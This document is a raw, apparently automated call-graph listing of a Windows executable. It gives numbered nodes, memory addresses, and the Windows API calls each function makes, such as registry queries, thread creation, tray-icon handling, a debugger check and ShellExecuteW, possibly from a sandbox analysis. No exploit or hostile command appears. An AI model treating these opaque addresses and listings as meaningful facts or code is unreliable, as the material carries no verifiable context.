94521->94522 94523 7ff65605b399 94522->94523 94523->94472 94524->94467 94525->94470 94526->94466 94527->94470 94528->94472 94530 7ff656004c68 4 API calls 94529->94530 94531 7ff655fe9663 94530->94531 94531->94479 94532->94493 94533->94495 94534->94490 94536 7ff655fe8314 CloseHandle 94535->94536 94537 7ff655fe82f2 Concurrency::wait 94536->94537 94538 7ff655fe8314 CloseHandle 94537->94538 94539 7ff655fe8303 94538->94539 94541 7ff655feb981 94540->94541 94544 7ff655feb976 memcpy_s 94540->94544 94542 7ff656004c68 4 API calls 94541->94542 94543 7ff65602ef2a 94541->94543 94542->94544 94544->94509 94546 7ff65605b19c WriteFile 94545->94546 94547 7ff65605b193 94545->94547 94546->94168 94549 7ff65605b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94547->94549 94549->94546 94551 7ff655fef123 memcpy_s 94550->94551 94552 7ff655fef111 94550->94552 94551->94202 94552->94551 94553 7ff656004c68 4 API calls 94552->94553 94553->94551 94555 7ff655fe9640 4 API calls 94554->94555 94556 7ff656056f76 94555->94556 94557 7ff655fe98e8 4 API calls 94556->94557 94558 7ff656056f87 94557->94558 94559 7ff656056a5c CompareStringW 94558->94559 94565 7ff656056fb6 94558->94565 94560 7ff656056faf 94559->94560 94562 7ff655fe7da4 4 API calls 94560->94562 94560->94565 94562->94565 94563 7ff655fe7da4 4 API calls 94563->94565 94564 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94564->94565 94565->94563 94565->94564 94566 7ff656057072 94565->94566 94568 7ff65605704f 94565->94568 94588 7ff656056a5c 94565->94588 94567 7ff655fef0ec 4 API calls 94566->94567 94569 7ff656057083 Concurrency::wait 94566->94569 94567->94569 94570 7ff655fe7da4 4 API calls 94568->94570 94569->94208 94571 7ff656057065 94570->94571 94595 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94571->94595 94573->94210 94575 7ff65602d32c 94574->94575 94578 7ff655fe7dd3 94574->94578 94603 7ff655fedda4 94575->94603 94577 7ff65602d33f 94578->94575 94579 7ff655fe7dff 94578->94579 94582 7ff65602d2e4 94578->94582 94598 7ff655fe7e4c 94579->94598 94581 7ff655fe7e0a memcpy_s 94581->94200 94583 7ff656004c68 4 API calls 94582->94583 94583->94575 94584->94203 94585->94208 94586->94210 94587->94210 94589 7ff656056a90 94588->94589 94590 7ff656056ad6 94589->94590 94591 7ff656056b81 94589->94591 94592 7ff656056ac0 94589->94592 94590->94565 94591->94590 94597 7ff656001ad0 CompareStringW 94591->94597 94592->94590 94596 7ff656001ad0 CompareStringW 94592->94596 94595->94566 94596->94592 94597->94591 94600 7ff655fe7e7b 94598->94600 94602 7ff655fe7e6b 94598->94602 94599 7ff65602d346 94600->94599 94601 7ff656004c68 4 API calls 94600->94601 94601->94602 94602->94581 94604 7ff655fedda9 94603->94604 94605 7ff655feddc7 memcpy_s 94603->94605 94604->94605 94607 7ff655fea7c0 94604->94607 94605->94577 94605->94605 94608 7ff655fea7dd memcpy_s 94607->94608 94609 7ff655fea7ed 94607->94609 94608->94605 94610 7ff65602e7da 94609->94610 94611 7ff656004c68 4 API calls 94609->94611 94611->94608 94615 7ff65605c7c0 lstrlenW 94612->94615 94616 7ff65605c7dd GetFileAttributesW 94615->94616 94618 7ff65605bdf5 94615->94618 94617 7ff65605c7eb FindFirstFileW 94616->94617 94616->94618 94617->94618 94619 7ff65605c7ff FindClose 94617->94619 94618->94221 94619->94618 94620->94233 94621->94270 94622->94274 94623->94280 94624->94288 94625->94281 94626->94291 94627->94297 94629->94297 94630->94308 94631->94308 94632->94307 94633 7ff656008fac 94634 7ff65600901c 94633->94634 94635 7ff656008fd2 GetModuleHandleW 94633->94635 94650 7ff65601b9bc EnterCriticalSection 94634->94650 94635->94634 94642 7ff656008fdf 94635->94642 94637 7ff6560090cb 94638 7ff65601ba10 _isindst LeaveCriticalSection 94637->94638 94640 7ff6560090f0 94638->94640 94639 7ff656009026 94639->94637 94641 7ff6560090a0 94639->94641 94645 7ff65601aa8c 30 API calls 94639->94645 94644 7ff6560090fc 94640->94644 94649 7ff656009118 11 API calls 94640->94649 94643 7ff6560090b8 94641->94643 94647 7ff65601ada4 75 API calls 94641->94647 94642->94634 94651 7ff656009164 GetModuleHandleExW 94642->94651 94648 7ff65601ada4 75 API calls 94643->94648 94645->94641 94647->94643 94648->94637 94649->94644 94652 7ff65600918e GetProcAddress 94651->94652 94653 7ff6560091b5 94651->94653 94652->94653 94656 7ff6560091a8 94652->94656 94654 7ff6560091bf FreeLibrary 94653->94654 94655 7ff6560091c5 94653->94655 94654->94655 94655->94634 94656->94653 94657 7ff65603b221 94658 7ff65603b22a 94657->94658 94665 7ff655ff0378 94657->94665 94680 7ff6560547bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94658->94680 94660 7ff65603b241 94681 7ff656054708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94660->94681 94662 7ff65603b264 94663 7ff655ff3c20 301 API calls 94662->94663 94664 7ff65603b292 94663->94664 94671 7ff655ff0405 94664->94671 94682 7ff656078d98 49 API calls Concurrency::wait 94664->94682 94674 7ff655fef7b8 94665->94674 94668 7ff65603b2d9 Concurrency::wait 94668->94665 94683 7ff6560547bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94668->94683 94669 7ff655ff070a 94671->94669 94673 7ff655fee0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94671->94673 94684 7ff655feee20 5 API calls Concurrency::wait 94671->94684 94673->94671 94678 7ff655fef7d5 94674->94678 94675 7ff655fef7de 94675->94671 94676 7ff655fe9640 4 API calls 94676->94678 94677 7ff655fee0a8 4 API calls 94677->94678 94678->94675 94678->94676 94678->94677 94679 7ff655fef7b8 4 API calls 94678->94679 94679->94678 94680->94660 94681->94662 94682->94668 94683->94668 94684->94671 94685 7ff65603f890 94694 7ff655fee18c 94685->94694 94687 7ff65603f8a9 94689 7ff65603f915 Concurrency::wait 94687->94689 94700 7ff656002ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94687->94700 94692 7ff6560403e1 Concurrency::wait 94689->94692 94702 7ff6560634e4 77 API calls 3 library calls 94689->94702 94691 7ff65603f8f6 94691->94689 94701 7ff656061464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94691->94701 94695 7ff655fee1c2 94694->94695 94696 7ff655fee1a7 94694->94696 94698 7ff655fee1af 94695->94698 94704 7ff655feee20 5 API calls Concurrency::wait 94695->94704 94703 7ff655feee20 5 API calls Concurrency::wait 94696->94703 94698->94687 94700->94691 94702->94692 94703->94698 94704->94698 94705 7ff655fe5dec 94706 7ff655fe5df4 94705->94706 94707 7ff655fe5e98 94706->94707 94708 7ff655fe5e28 94706->94708 94727 7ff655fe5e96 94706->94727 94712 7ff65602c229 94707->94712 94713 7ff655fe5e9e 94707->94713 94709 7ff655fe5e35 94708->94709 94710 7ff655fe5f21 PostQuitMessage 94708->94710 94714 7ff655fe5e40 94709->94714 94715 7ff65602c2af 94709->94715 94717 7ff655fe5e7c 94710->94717 94711 7ff655fe5e6b DefWindowProcW 94711->94717 94761 7ff655ffede4 8 API calls 94712->94761 94718 7ff655fe5ea5 94713->94718 94719 7ff655fe5ecc SetTimer RegisterWindowMessageW 94713->94719 94720 7ff655fe5f2b 94714->94720 94721 7ff655fe5e49 94714->94721 94773 7ff65605a40c 16 API calls __scrt_fastfail 94715->94773 94725 7ff65602c1b8 94718->94725 94726 7ff655fe5eae KillTimer 94718->94726 94719->94717 94722 7ff655fe5efc CreatePopupMenu 94719->94722 94751 7ff656004610 94720->94751 94721->94727 94734 7ff655fe5e5f 94721->94734 94735 7ff655fe5f0b 94721->94735 94722->94717 94724 7ff65602c255 94762 7ff656002c44 47 API calls Concurrency::wait 94724->94762 94731 7ff65602c1f7 MoveWindow 94725->94731 94732 7ff65602c1bd 94725->94732 94747 7ff655fe5d88 94726->94747 94727->94711 94728 7ff65602c2c3 94728->94711 94728->94717 94731->94717 94736 7ff65602c1e4 SetFocus 94732->94736 94737 7ff65602c1c2 94732->94737 94734->94711 94744 7ff655fe5d88 Shell_NotifyIconW 94734->94744 94759 7ff655fe5f3c 26 API calls __scrt_fastfail 94735->94759 94736->94717 94737->94734 94740 7ff65602c1cb 94737->94740 94760 7ff655ffede4 8 API calls 94740->94760 94742 7ff655fe5f1f 94742->94717 94745 7ff65602c280 94744->94745 94763 7ff655fe6258 94745->94763 94748 7ff655fe5de4 94747->94748 94749 7ff655fe5d99 __scrt_fastfail 94747->94749 94758 7ff655fe7098 DeleteObject DestroyWindow Concurrency::wait 94748->94758 94750 7ff655fe5db8 Shell_NotifyIconW 94749->94750 94750->94748 94752 7ff6560046db 94751->94752 94753 7ff65600461a __scrt_fastfail 94751->94753 94752->94717 94774 7ff655fe72c8 94753->94774 94755 7ff6560046a2 KillTimer SetTimer 94755->94752 94756 7ff656004660 94756->94755 94757 7ff65604aaa1 Shell_NotifyIconW 94756->94757 94757->94755 94758->94717 94759->94742 94760->94717 94761->94724 94762->94734 94764 7ff655fe6287 __scrt_fastfail 94763->94764 94808 7ff655fe61c4 94764->94808 94767 7ff655fe632d 94769 7ff655fe634e Shell_NotifyIconW 94767->94769 94770 7ff65602c644 Shell_NotifyIconW 94767->94770 94771 7ff655fe72c8 6 API calls 94769->94771 94772 7ff655fe6365 94771->94772 94772->94727 94773->94728 94775 7ff655fe72f4 94774->94775 94776 7ff655fe73bc Concurrency::wait 94774->94776 94777 7ff655fe98e8 4 API calls 94775->94777 94776->94756 94778 7ff655fe7303 94777->94778 94779 7ff65602cdfc LoadStringW 94778->94779 94780 7ff655fe7310 94778->94780 94782 7ff65602ce1e 94779->94782 94796 7ff655fe7cf4 94780->94796 94784 7ff655fee0a8 4 API calls 94782->94784 94783 7ff655fe7324 94785 7ff65602ce30 94783->94785 94786 7ff655fe7336 94783->94786 94792 7ff655fe734f __scrt_fastfail wcscpy 94784->94792 94807 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94785->94807 94786->94782 94787 7ff655fe7343 94786->94787 94806 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94787->94806 94790 7ff65602ce3c 94791 7ff655fe71f8 4 API calls 94790->94791 94790->94792 94793 7ff65602ce63 94791->94793 94794 7ff655fe73a3 Shell_NotifyIconW 94792->94794 94795 7ff655fe71f8 4 API calls 94793->94795 94794->94776 94795->94792 94797 7ff65602d2c8 94796->94797 94798 7ff655fe7d0d 94796->94798 94799 7ff655fedda4 4 API calls 94797->94799 94801 7ff655fe7d24 94798->94801 94803 7ff655fe7d51 94798->94803 94800 7ff65602d2d3 94799->94800 94802 7ff655fe7e4c 4 API calls 94801->94802 94805 7ff655fe7d2f memcpy_s 94802->94805 94803->94800 94804 7ff656004c68 4 API calls 94803->94804 94804->94805 94805->94783 94806->94792 94807->94790 94809 7ff65602c5f8 94808->94809 94810 7ff655fe61e0 94808->94810 94809->94810 94811 7ff65602c602 DestroyIcon 94809->94811 94810->94767 94812 7ff65605ad94 39 API calls wcsftime 94810->94812 94811->94810 94812->94767 94813 7ff655ff2bf8 94816 7ff655feed44 94813->94816 94815 7ff655ff2c05 94817 7ff655feed75 94816->94817 94818 7ff655feedcd 94816->94818 94817->94818 94820 7ff655ff3c20 301 API calls 94817->94820 94823 7ff655feedfe 94818->94823 94826 7ff6560634e4 77 API calls 3 library calls 94818->94826 94822 7ff655feeda8 94820->94822 94821 7ff65603a636 94822->94823 94825 7ff655feee20 5 API calls Concurrency::wait 94822->94825 94823->94815 94825->94818 94826->94821 94827 7ff656005328 94852 7ff656004cac 94827->94852 94830 7ff656005474 94886 7ff6560057e4 7 API calls __scrt_fastfail 94830->94886 94831 7ff656005344 94833 7ff65600547e 94831->94833 94834 7ff656005362 94831->94834 94887 7ff6560057e4 7 API calls __scrt_fastfail 94833->94887 94843 7ff6560053a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 94834->94843 94858 7ff65601ae1c 94834->94858 94838 7ff656005387 94839 7ff656005489 abort 94841 7ff65600540d 94869 7ff656005930 94841->94869 94843->94841 94883 7ff656009204 35 API calls FindHandler 94843->94883 94844 7ff656005412 94872 7ff655fe3730 94844->94872 94849 7ff656005435 94849->94839 94885 7ff656004e90 8 API calls 2 library calls 94849->94885 94851 7ff65600544c 94851->94838 94853 7ff656004cce __scrt_initialize_crt 94852->94853 94888 7ff6560065ec 94853->94888 94855 7ff656004cd7 94855->94830 94855->94831 94856 7ff656004cd3 __scrt_initialize_crt 94856->94855 94896 7ff656006620 8 API calls 3 library calls 94856->94896 94860 7ff65601ae34 94858->94860 94859 7ff656005383 94859->94838 94862 7ff65601ada4 94859->94862 94860->94859 94921 7ff656005244 94860->94921 94863 7ff65601adff 94862->94863 94864 7ff65601ade0 94862->94864 94863->94843 94864->94863 94995 7ff655fe1064 94864->94995 95000 7ff655fe1048 94864->95000 95005 7ff655fe1080 94864->95005 95010 7ff655fe10e8 94864->95010 95204 7ff656006240 94869->95204 94873 7ff655fe3743 IsThemeActive 94872->94873 94874 7ff655fe37a3 94872->94874 95206 7ff6560092d0 94873->95206 94884 7ff656005974 GetModuleHandleW 94874->94884 94880 7ff655fe377d 95218 7ff655fe37b0 94880->95218 94882 7ff655fe3785 SystemParametersInfoW 94882->94874 94883->94841 94884->94849 94885->94851 94886->94833 94887->94839 94889 7ff6560065f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94888->94889 94897 7ff656007290 94889->94897 94892 7ff656006603 94892->94856 94894 7ff65600660c 94894->94892 94904 7ff6560072d8 DeleteCriticalSection 94894->94904 94896->94855 94898 7ff656007298 94897->94898 94900 7ff6560072c9 94898->94900 94902 7ff6560065ff 94898->94902 94905 7ff656007614 94898->94905 94910 7ff6560072d8 DeleteCriticalSection 94900->94910 94902->94892 94903 7ff656007218 8 API calls 3 library calls 94902->94903 94903->94894 94904->94892 94911 7ff656007310 94905->94911 94908 7ff656007654 94908->94898 94909 7ff65600765f InitializeCriticalSectionAndSpinCount 94909->94908 94910->94902 94912 7ff656007371 94911->94912 94919 7ff65600736c try_get_function 94911->94919 94912->94908 94912->94909 94913 7ff656007454 94913->94912 94916 7ff656007462 GetProcAddress 94913->94916 94914 7ff6560073a0 LoadLibraryExW 94915 7ff6560073c1 GetLastError 94914->94915 94914->94919 94915->94919 94917 7ff656007473 94916->94917 94917->94912 94918 7ff656007439 FreeLibrary 94918->94919 94919->94912 94919->94913 94919->94914 94919->94918 94920 7ff6560073fb LoadLibraryExW 94919->94920 94920->94919 94922 7ff656005254 94921->94922 94938 7ff656012584 94922->94938 94924 7ff656005260 94944 7ff656004cf8 94924->94944 94927 7ff656005279 _RTC_Initialize 94936 7ff6560052ce 94927->94936 94949 7ff656004f0c 94927->94949 94928 7ff6560052fa __scrt_initialize_default_local_stdio_options 94928->94860 94930 7ff65600528e 94952 7ff65601a09c 94930->94952 94934 7ff6560052a3 94935 7ff65601aebc 35 API calls 94934->94935 94935->94936 94937 7ff6560052ea 94936->94937 94975 7ff6560057e4 7 API calls __scrt_fastfail 94936->94975 94937->94860 94939 7ff656012595 94938->94939 94940 7ff65601259d 94939->94940 94976 7ff6560155d4 15 API calls _invalid_parameter_noinfo 94939->94976 94940->94924 94942 7ff6560125ac 94977 7ff65601b164 31 API calls _invalid_parameter_noinfo 94942->94977 94945 7ff656004d16 __scrt_initialize_onexit_tables 94944->94945 94946 7ff656004d0d 94944->94946 94945->94927 94946->94945 94978 7ff6560057e4 7 API calls __scrt_fastfail 94946->94978 94948 7ff656004dcf 94979 7ff656004ebc 94949->94979 94951 7ff656004f15 94951->94930 94953 7ff65601a0ba 94952->94953 94954 7ff65601a0d0 GetModuleFileNameW 94952->94954 94984 7ff6560155d4 15 API calls _invalid_parameter_noinfo 94953->94984 94958 7ff65601a0fd 94954->94958 94956 7ff65601a0bf 94985 7ff65601b164 31 API calls _invalid_parameter_noinfo 94956->94985 94986 7ff65601a038 15 API calls 2 library calls 94958->94986 94959 7ff65600529a 94959->94936 94974 7ff656005ac4 InitializeSListHead 94959->94974 94961 7ff65601a13d 94962 7ff65601a145 94961->94962 94964 7ff65601a156 94961->94964 94987 7ff6560155d4 15 API calls _invalid_parameter_noinfo 94962->94987 94966 7ff65601a1bb 94964->94966 94967 7ff65601a1a2 94964->94967 94972 7ff65601a14a 94964->94972 94965 7ff65601b3c0 __free_lconv_num 15 API calls 94965->94959 94970 7ff65601b3c0 __free_lconv_num 15 API calls 94966->94970 94988 7ff65601b3c0 94967->94988 94969 7ff65601a1ab 94971 7ff65601b3c0 __free_lconv_num 15 API calls 94969->94971 94970->94972 94973 7ff65601a1b7 94971->94973 94972->94965 94973->94959 94975->94928 94976->94942 94977->94940 94978->94948 94980 7ff656004ee1 _onexit 94979->94980 94981 7ff656004eeb 94979->94981 94980->94951 94983 7ff65601ab08 34 API calls _onexit 94981->94983 94983->94980 94984->94956 94985->94959 94986->94961 94987->94972 94989 7ff65601b3c5 RtlFreeHeap 94988->94989 94993 7ff65601b3f5 __free_lconv_num 94988->94993 94990 7ff65601b3e0 94989->94990 94989->94993 94994 7ff6560155d4 15 API calls _invalid_parameter_noinfo 94990->94994 94992 7ff65601b3e5 GetLastError 94992->94993 94993->94969 94994->94992 95015 7ff655fe7ec0 94995->95015 94997 7ff655fe106d 94998 7ff656004ebc _onexit 34 API calls 94997->94998 94999 7ff656004f15 94998->94999 94999->94864 95099 7ff655fe7718 95000->95099 95003 7ff656004ebc _onexit 34 API calls 95004 7ff656004f15 95003->95004 95004->94864 95117 7ff655fe7920 95005->95117 95007 7ff655fe109e 95008 7ff656004ebc _onexit 34 API calls 95007->95008 95009 7ff656004f15 95008->95009 95009->94864 95180 7ff656001d80 95010->95180 95013 7ff656004ebc _onexit 34 API calls 95014 7ff656004f15 95013->95014 95014->94864 95051 7ff655fe82b4 95015->95051 95018 7ff655fe82b4 4 API calls 95019 7ff655fe7f3a 95018->95019 95020 7ff655fe9640 4 API calls 95019->95020 95021 7ff655fe7f46 95020->95021 95022 7ff655fe7cf4 4 API calls 95021->95022 95023 7ff655fe7f59 95022->95023 95058 7ff656002d5c 6 API calls 95023->95058 95025 7ff655fe7fa5 95026 7ff655fe9640 4 API calls 95025->95026 95027 7ff655fe7fb1 95026->95027 95028 7ff655fe9640 4 API calls 95027->95028 95029 7ff655fe7fbd 95028->95029 95030 7ff655fe9640 4 API calls 95029->95030 95031 7ff655fe7fc9 95030->95031 95032 7ff655fe9640 4 API calls 95031->95032 95033 7ff655fe800f 95032->95033 95034 7ff655fe9640 4 API calls 95033->95034 95035 7ff655fe80f7 95034->95035 95059 7ff655ffef88 95035->95059 95037 7ff655fe8103 95066 7ff655ffeec8 95037->95066 95039 7ff655fe812f 95040 7ff655fe9640 4 API calls 95039->95040 95041 7ff655fe813b 95040->95041 95077 7ff655ff6d40 95041->95077 95045 7ff655fe81ac 95046 7ff655fe81be GetStdHandle 95045->95046 95047 7ff655fe8220 OleInitialize 95046->95047 95048 7ff65602d350 95046->95048 95047->94997 95094 7ff65605ffc8 CreateThread 95048->95094 95050 7ff65602d367 CloseHandle 95052 7ff655fe9640 4 API calls 95051->95052 95053 7ff655fe82c6 95052->95053 95054 7ff655fe9640 4 API calls 95053->95054 95055 7ff655fe82cf 95054->95055 95056 7ff655fe9640 4 API calls 95055->95056 95057 7ff655fe7f2e 95056->95057 95057->95018 95058->95025 95060 7ff655fe9640 4 API calls 95059->95060 95061 7ff655ffefa3 95060->95061 95062 7ff655fe9640 4 API calls 95061->95062 95063 7ff655ffefac 95062->95063 95064 7ff655fe9640 4 API calls 95063->95064 95065 7ff655fff02e 95064->95065 95065->95037 95067 7ff655ffeede 95066->95067 95068 7ff655fe9640 4 API calls 95067->95068 95069 7ff655ffeeea 95068->95069 95070 7ff655fe9640 4 API calls 95069->95070 95071 7ff655ffeef6 95070->95071 95072 7ff655fe9640 4 API calls 95071->95072 95073 7ff655ffef02 95072->95073 95074 7ff655fe9640 4 API calls 95073->95074 95075 7ff655ffef0e 95074->95075 95076 7ff655ffef68 RegisterWindowMessageW 95075->95076 95076->95039 95078 7ff655ff6d80 95077->95078 95079 7ff655ff6db9 95077->95079 95080 7ff655fe816b 95078->95080 95096 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95078->95096 95095 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95079->95095 95087 7ff6560039a8 95080->95087 95088 7ff65604a502 95087->95088 95089 7ff6560039cc 95087->95089 95097 7ff655feee20 5 API calls Concurrency::wait 95088->95097 95089->95045 95091 7ff65604a50e 95098 7ff655feee20 5 API calls Concurrency::wait 95091->95098 95093 7ff65604a52d 95094->95050 95097->95091 95098->95093 95100 7ff655fe9640 4 API calls 95099->95100 95101 7ff655fe778f 95100->95101 95106 7ff655fe6f24 95101->95106 95104 7ff655fe782c 95105 7ff655fe1051 95104->95105 95109 7ff655fe7410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95104->95109 95105->95003 95110 7ff655fe6f60 95106->95110 95109->95104 95111 7ff655fe6f85 95110->95111 95112 7ff655fe6f52 95110->95112 95111->95112 95113 7ff655fe6f93 RegOpenKeyExW 95111->95113 95112->95104 95113->95112 95114 7ff655fe6faf RegQueryValueExW 95113->95114 95115 7ff655fe6ff5 RegCloseKey 95114->95115 95116 7ff655fe6fdd 95114->95116 95115->95112 95116->95115 95118 7ff655fe7948 wcsftime 95117->95118 95119 7ff655fe9640 4 API calls 95118->95119 95120 7ff655fe7a02 95119->95120 95147 7ff655fe5680 95120->95147 95122 7ff655fe7a0c 95154 7ff656003a38 95122->95154 95125 7ff655fe71f8 4 API calls 95126 7ff655fe7a2c 95125->95126 95160 7ff655fe4680 95126->95160 95128 7ff655fe7a3d 95129 7ff655fe9640 4 API calls 95128->95129 95130 7ff655fe7a47 95129->95130 95164 7ff655fea854 95130->95164 95133 7ff655fe7a83 Concurrency::wait 95133->95007 95134 7ff65602d05c RegQueryValueExW 95135 7ff65602d131 RegCloseKey 95134->95135 95136 7ff65602d08f 95134->95136 95135->95133 95146 7ff65602d147 wcscat Concurrency::wait 95135->95146 95137 7ff656004c68 4 API calls 95136->95137 95139 7ff65602d0b2 95137->95139 95138 7ff655fe9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95138->95146 95140 7ff65602d0bf RegQueryValueExW 95139->95140 95141 7ff65602d0f3 95140->95141 95143 7ff65602d112 95140->95143 95142 7ff655fe7cf4 4 API calls 95141->95142 95142->95143 95143->95135 95144 7ff655feec00 4 API calls 95144->95146 95145 7ff655fe4680 4 API calls 95145->95146 95146->95133 95146->95138 95146->95144 95146->95145 95168 7ff656028f90 95147->95168 95150 7ff655feec00 4 API calls 95151 7ff655fe56b4 95150->95151 95170 7ff655fe56d4 95151->95170 95153 7ff655fe56c1 Concurrency::wait 95153->95122 95155 7ff656028f90 wcsftime 95154->95155 95156 7ff656003a44 GetFullPathNameW 95155->95156 95157 7ff656003a74 95156->95157 95158 7ff655fe7cf4 4 API calls 95157->95158 95159 7ff655fe7a1b 95158->95159 95159->95125 95161 7ff655fe469f 95160->95161 95162 7ff655fe46c8 memcpy_s 95160->95162 95163 7ff656004c68 4 API calls 95161->95163 95162->95128 95163->95162 95165 7ff655fea87a 95164->95165 95166 7ff655fe7a51 RegOpenKeyExW 95164->95166 95167 7ff656004c68 4 API calls 95165->95167 95166->95133 95166->95134 95167->95166 95169 7ff655fe568c GetModuleFileNameW 95168->95169 95169->95150 95171 7ff656028f90 wcsftime 95170->95171 95172 7ff655fe56e9 GetFullPathNameW 95171->95172 95173 7ff655fe5712 95172->95173 95174 7ff65602c03a 95172->95174 95176 7ff655fe7cf4 4 API calls 95173->95176 95175 7ff655fea854 4 API calls 95174->95175 95178 7ff655fe571c 95175->95178 95176->95178 95177 7ff655fedda4 4 API calls 95179 7ff655fe5785 95177->95179 95178->95177 95178->95178 95179->95153 95181 7ff655fe9640 4 API calls 95180->95181 95182 7ff656001db2 GetVersionExW 95181->95182 95183 7ff655fe7cf4 4 API calls 95182->95183 95185 7ff656001dfc 95183->95185 95184 7ff655fedda4 4 API calls 95184->95185 95185->95184 95186 7ff656001e87 95185->95186 95187 7ff655fedda4 4 API calls 95186->95187 95192 7ff656001ea4 95187->95192 95188 7ff656049645 95189 7ff65604964f 95188->95189 95202 7ff6560532f4 LoadLibraryA GetProcAddress 95189->95202 95190 7ff656001f3c GetCurrentProcess IsWow64Process 95191 7ff656001f7e __scrt_fastfail 95190->95191 95191->95189 95194 7ff656001f86 GetSystemInfo 95191->95194 95192->95188 95192->95190 95196 7ff655fe10f1 95194->95196 95195 7ff6560496b1 95197 7ff6560496d7 GetSystemInfo 95195->95197 95198 7ff6560496b5 95195->95198 95196->95013 95200 7ff6560496bf 95197->95200 95203 7ff6560532f4 LoadLibraryA GetProcAddress 95198->95203 95200->95196 95201 7ff6560496f0 FreeLibrary 95200->95201 95201->95196 95202->95195 95203->95200 95205 7ff656005947 GetStartupInfoW 95204->95205 95205->94844 95264 7ff65601b9bc EnterCriticalSection 95206->95264 95208 7ff6560092e4 95209 7ff65601ba10 _isindst LeaveCriticalSection 95208->95209 95210 7ff655fe376e 95209->95210 95211 7ff656009334 95210->95211 95212 7ff65600933d 95211->95212 95213 7ff655fe3778 95211->95213 95265 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95212->95265 95217 7ff655fe36e8 SystemParametersInfoW SystemParametersInfoW 95213->95217 95215 7ff656009342 95266 7ff65601b164 31 API calls _invalid_parameter_noinfo 95215->95266 95217->94880 95219 7ff655fe37cd wcsftime 95218->95219 95220 7ff655fe9640 4 API calls 95219->95220 95221 7ff655fe37dd GetCurrentDirectoryW 95220->95221 95267 7ff655fe57a0 95221->95267 95223 7ff655fe3807 IsDebuggerPresent 95224 7ff655fe3815 95223->95224 95225 7ff65602b872 MessageBoxA 95223->95225 95226 7ff65602b894 95224->95226 95227 7ff655fe3839 95224->95227 95225->95226 95377 7ff655fee278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95226->95377 95341 7ff655fe3f04 95227->95341 95231 7ff655fe3860 GetFullPathNameW 95232 7ff655fe7cf4 4 API calls 95231->95232 95233 7ff655fe38a6 95232->95233 95357 7ff655fe3f9c 95233->95357 95234 7ff655fe38bf 95236 7ff65602b8dc SetCurrentDirectoryW 95234->95236 95237 7ff655fe38c7 95234->95237 95236->95237 95238 7ff655fe38d0 95237->95238 95378 7ff65604d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 95237->95378 95373 7ff655fe3b84 7 API calls 95238->95373 95241 7ff65602b8f8 95241->95238 95244 7ff65602b90c 95241->95244 95246 7ff655fe5680 6 API calls 95244->95246 95245 7ff655fe38da 95248 7ff655fe6258 46 API calls 95245->95248 95252 7ff655fe38ef 95245->95252 95247 7ff65602b916 95246->95247 95249 7ff655feec00 4 API calls 95247->95249 95248->95252 95250 7ff65602b927 95249->95250 95253 7ff65602b94d 95250->95253 95254 7ff65602b930 95250->95254 95251 7ff655fe3913 95257 7ff655fe391f SetCurrentDirectoryW 95251->95257 95252->95251 95255 7ff655fe5d88 Shell_NotifyIconW 95252->95255 95258 7ff655fe71f8 4 API calls 95253->95258 95256 7ff655fe71f8 4 API calls 95254->95256 95255->95251 95260 7ff65602b93c 95256->95260 95259 7ff655fe3934 Concurrency::wait 95257->95259 95261 7ff65602b963 GetForegroundWindow ShellExecuteW 95258->95261 95259->94882 95379 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95260->95379 95263 7ff65602b99f Concurrency::wait 95261->95263 95263->95251 95265->95215 95266->95213 95268 7ff655fe9640 4 API calls 95267->95268 95269 7ff655fe57d7 95268->95269 95380 7ff655fe9bbc 95269->95380 95271 7ff655fe57fe 95272 7ff655fe5680 6 API calls 95271->95272 95273 7ff655fe5812 95272->95273 95274 7ff655feec00 4 API calls 95273->95274 95275 7ff655fe5823 95274->95275 95394 7ff655fe6460 95275->95394 95278 7ff65602c05e 95467 7ff656062948 95278->95467 95280 7ff655fe584e Concurrency::wait 95282 7ff655fee0a8 4 API calls 95280->95282 95281 7ff65602c074 95283 7ff65602c081 95281->95283 95285 7ff655fe652c 63 API calls 95281->95285 95284 7ff655fe586a 95282->95284 95485 7ff655fe652c 95283->95485 95287 7ff655feec00 4 API calls 95284->95287 95285->95283 95288 7ff655fe5888 95287->95288 95292 7ff65602c099 95288->95292 95420 7ff655feeff8 95288->95420 95290 7ff655fe58ad Concurrency::wait 95291 7ff655feec00 4 API calls 95290->95291 95293 7ff655fe58d7 95291->95293 95295 7ff655fe5ab4 4 API calls 95292->95295 95293->95292 95294 7ff655feeff8 46 API calls 95293->95294 95297 7ff655fe58fc Concurrency::wait 95294->95297 95296 7ff65602c0e1 95295->95296 95298 7ff655fe5ab4 4 API calls 95296->95298 95300 7ff655fe9640 4 API calls 95297->95300 95299 7ff65602c103 95298->95299 95303 7ff655fe5680 6 API calls 95299->95303 95301 7ff655fe591f 95300->95301 95433 7ff655fe5ab4 95301->95433 95305 7ff65602c12b 95303->95305 95307 7ff655fe5ab4 4 API calls 95305->95307 95309 7ff65602c139 95307->95309 95308 7ff655fe5941 95308->95292 95310 7ff655fe5949 95308->95310 95311 7ff655fee0a8 4 API calls 